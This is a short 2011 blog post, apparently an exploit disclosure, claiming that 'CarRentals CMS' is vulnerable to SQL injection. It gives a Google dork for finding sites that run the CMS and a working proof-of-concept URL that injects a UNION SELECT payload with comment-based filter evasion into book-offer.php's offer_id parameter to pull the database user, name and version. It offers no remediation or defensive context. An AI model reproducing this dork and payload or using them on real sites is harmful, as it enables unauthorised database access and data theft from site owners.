CarRentals CMS Vulnerable to SQL Injection ~ Random stuff by yappare

Monday, August 8, 2011

CarRentals CMS Vulnerable to SQL Injection

on August 08, 2011 in Security, SQLi No comments

Title : CarRentals CMS Vulnerable to SQL Injection
Vendor : N/A
Dork : intext:"Powered by CarRentals CMS"
Category: WebApps

http://localhost.com/*.php?id=[SQL]

~/POC/~
-------

http://localhost.com/book-offer.php?offer_id=-1' /*!12345union*/ select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11--+

thanks,
-p0pc0rn-

Random stuff by yappare

Monday, August 8, 2011

CarRentals CMS Vulnerable to SQL Injection

0 comments:

Text Widget

Popular Posts

Pages

Blog Archive

Recent Posts

Unordered List

Categories